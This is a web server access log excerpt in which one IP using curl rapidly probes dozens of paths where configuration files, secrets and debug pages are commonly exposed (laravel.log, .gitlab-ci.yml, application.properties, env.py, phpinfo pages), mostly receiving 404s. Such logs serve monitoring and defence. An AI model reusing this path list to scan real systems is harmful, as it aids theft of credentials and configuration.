185.177.72.52 - - [14/Jan/2026:09:33:42 +0800] "GET /staticfiles HTTP/1.1" 404 8923 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:43 +0800] "GET /_profiler/phpinfo HTTP/1.1" 404 8923 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:44 +0800] "GET /storage/logs/laravel.log HTTP/1.1" 404 8923 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:44 +0800] "GET /phpversion.php HTTP/1.1" 404 47 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:45 +0800] "GET /Dockerfile HTTP/1.1" 404 8923 "-" "curl/8.7.1"
36.133.115.36 - - [14/Jan/2026:09:33:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768354426.5228619575500488281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.177.72.52 - - [14/Jan/2026:09:33:46 +0800] "GET /settings.json HTTP/1.1" 404 8923 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:47 +0800] "GET /src/main/resources/appsettings.yml HTTP/1.1" 404 8923 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:48 +0800] "GET /configs/application.ini HTTP/1.1" 404 8923 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:49 +0800] "GET /login/index.php HTTP/1.1" 404 47 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:50 +0800] "GET /src/main/resources/application.properties HTTP/1.1" 404 8927 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:50 +0800] "GET /install/index.php HTTP/1.1" 404 47 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:50 +0800] "GET /config.php HTTP/1.1" 404 47 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:51 +0800] "GET /products/.gitlab-ci.yml HTTP/1.1" 404 8929 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:52 +0800] "GET /manifest.json HTTP/1.1" 404 8923 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:52 +0800] "GET /php-info.php HTTP/1.1" 404 47 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:53 +0800] "GET /config.json HTTP/1.1" 404 8929 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:54 +0800] "GET /?q=info HTTP/1.1" 200 35123 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:56 +0800] "GET /?xdebuginfo HTTP/1.1" 200 34700 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:57 +0800] "GET /admin/test HTTP/1.1" 404 8929 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:57 +0800] "GET /php.php HTTP/1.1" 404 47 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:58 +0800] "GET /Node.js/JavaScript HTTP/1.1" 404 8929 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:33:59 +0800] "GET /config/production.json HTTP/1.1" 404 8929 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:34:00 +0800] "GET /config/settings.py HTTP/1.1" 404 8927 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:34:01 +0800] "GET /env.py HTTP/1.1" 404 8929 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:34:02 +0800] "GET /config.py HTTP/1.1" 404 8923 "-" "curl/8.7.1"
185.177.72.52 - - [14/Jan/2026:09:34:02 +0800] "GET /config/dev_config.py HTTP/1.1" 404 8923 "-" "curl/8.7.1"
